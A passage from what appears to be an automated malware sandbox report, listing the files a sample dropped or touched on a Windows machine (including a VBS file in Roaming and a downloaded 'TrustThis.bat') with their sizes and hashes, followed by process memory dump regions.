                                                      ca183f20c05c4863a296e6e66fb730e1c4fb685f

                                                      SHA256

                                                      d18c29dcd89d0a834cbc2ad952cec004a0248e41678ef4511947b983f0eec910

                                                      SHA512

                                                      968b0fa46610f3f9356c4367d98b924b68256d4058bcd8c57e758fad912d13b5f0809f03b0e855e513af6624d73be2458197f4e1282171fc690ac145330f7939

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                      Filesize

                                                      5KB

                                                      MD5

                                                      429aca79b27c95511aeda127edb65b32

                                                      SHA1

                                                      905f54cda543198aace96199233e9877ee48762d

                                                      SHA256

                                                      551c8f7684d049f831e85ff04003c786b2c72ad21c993d8d539b045e721c2db1

                                                      SHA512

                                                      8fb5e9141f465a337d8bc1aee3521f96fde60ff425380f7d0cc399c3d5092b959bac0ab4231af0cdc580f577924b8988d49e46c412e9fe6f61632477768b2720

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
  Filesize: 25KB
  MD5: 17e06e5e4734edf098fb260d9ea7f7f7
  SHA1: 9ba70165b592c9cf38bba00d7d427339669d935e
  SHA256: 8804b50b3eb37b0e261fa4e1256d4c14d9731022d4d0291832ba832aa397a1dc
  SHA512: 1a8909ff25232284868a7ca33e62a966b6d8c97647cd48689836029eeee1b1b1a1852b34aa5182275d3d93576f9d88593bf936c44a466933e2708b9362b989e4

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
  Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: fee621f504da1376cc810d5e87397b14
  SHA1: bdd09d8cbc322f4f1447c12d8198399944ba4fc0
  SHA256: fdeb83025c20dcc29ce833af6244b2be53bc2c61f27168d9c4d06be0e1521055
  SHA512: 8e44aa62b2ae590847823ee4dfb33e39cda4aaf455eedeb08b77691688031bdcd4fbe1b0cf1c0190b14b9df7b2a303da2e4b7d1f772550995f2511a584687b41

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\f26f14b8-d2c3-41f5-99cf-20714acbebf8.tmp
  Filesize: 10KB
  MD5: b2bad87fa5fc76fbc8b8032f1a125cd9
  SHA1: a7a913c186b3981bd147d1c732a8aac3a12da4aa
  SHA256: 4ba8f7d63715f51adc22222a06848f2d0aef86ecb20eb2dbd35df3580090ba97
  SHA512: e6b35513659cb539917dbc78ede619fca7ca23e929b5c0cca2f9c50bf19a58994d4a93942b3dfeb1e14930dea6354a7a513c7b61e2a92b69ada6009535fab63b

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 1KB
  MD5: 3ec0d76d886b2f4b9f1e3da7ce9e2cd7
  SHA1: 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
  SHA256: 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
  SHA512: a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_noryl1fy.o1h.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Roaming\Windows_Log_400.vbs
  Filesize: 115B
  MD5: 4e0de993e6fae5971a53bd5a7b908d53
  SHA1: 8dc0e353d265ed83f2fbbe3c0f9eb11e7cb7a278
  SHA256: 38a935c46112999bba892dce58db047662419a4114d46b0450cdd633f24373c7
  SHA512: d0c2b178c9ff91173f5e6ea17cf96b60f6e62edca5365f22405833e1d80fae7717c8329c6a7052f697707836ec67b7dfd5a1003b1cc32650406a226d6053dc82

• C:\Users\Admin\Downloads\TrustThis.bat:Zone.Identifier
  Filesize: 221B
  MD5: 28d59fb568930e2987ca6cbc351abd74
  SHA1: 95eaf3a6cded37181ed29ecc1519f8d7e698fd8e
  SHA256: 416cb0063e4c242367e1cc89808ba4b293d8a42c9cdacdd811c17f7de614baa1
  SHA512: fb324b2cc87b172f738d935e510ec33792b212a0cba134311c8fbfd01d5bc4a26896fdacc66b08380f29a1a1f84e72d0fc7d17bfc14c8d7c4b901cd897ac6359

• C:\Users\Admin\Downloads\Unconfirmed 247863.crdownload
  Filesize: 399KB
  MD5: 85b6801e12b0ee43cf2560af4de44ce5
  SHA1: 243e69b236417be977c73eadfbdfd55325e125b7
  SHA256: 9925507f83ab80df2cd03ad5ffd66571adc3eaf60c6bf136240e58ff29e13893
  SHA512: 4d792f91e03b70833b51054053a61fabcb11bfb22eb8d47cb19a5268c9633dd50443557b41a56b8ad18def99ab0b1b8e00a3533fec0e89ff668bd4c3ea28b944

• memory/2400-143-0x00000219F4E20000-0x00000219F4E66000-memory.dmp
  Filesize: 280KB

• memory/2400-144-0x00000219F4BB0000-0x00000219F4BB8000-memory.dmp
  Filesize: 32KB

• memory/2400-145-0x00000219F4DD0000-0x00000219F4E1C000-memory.dmp
  Filesize: 304KB

• memory/2400-139-0x00000219F4710000-0x00000219F4732000-memory.dmp
  Filesize: 136KB

• memory/3196-195-0x0000018B4B7E0000-0x0000018B4B7F6000-memory.dmp
  Filesize: 88KB

• memory/3356-184-0x00000000072C0000-0x00000000072E9000-memory.dmp
  Filesize: 164KB

• memory/3356-185-0x0000000002D40000-0x0000000002D49000-memory.dmp
  Filesize: 36KB

• memory/3356-187-0x000000000F8E0000-0x000000000FCE0000-memory.dmp
  Filesize: 4.0MB

• memory/3356-186-0x000000000F8E0000-0x000000000FCE0000-memory.dmp
  Filesize: 4.0MB

• memory/3936-188-0x000001C250CA0000-0x000001C250CAA000-memory.dmp
  Filesize: 40KB

• memory/3936-193-0x00007FFE72450000-0x00007FFE7250D000-memory.dmp
  Filesize: 756KB

• memory/3936-194-0x00007FFE70D10000-0x00007FFE71084000-memory.dmp
  Filesize: 3.5MB

• memory/3936-192-0x00007FFE735A0000-0x00007FFE737A9000-memory.dmp
  Filesize: 2.0MB

• memory/3936-191-0x000001C252780000-0x000001C252B80000-memory.dmp
  Filesize: 4.0MB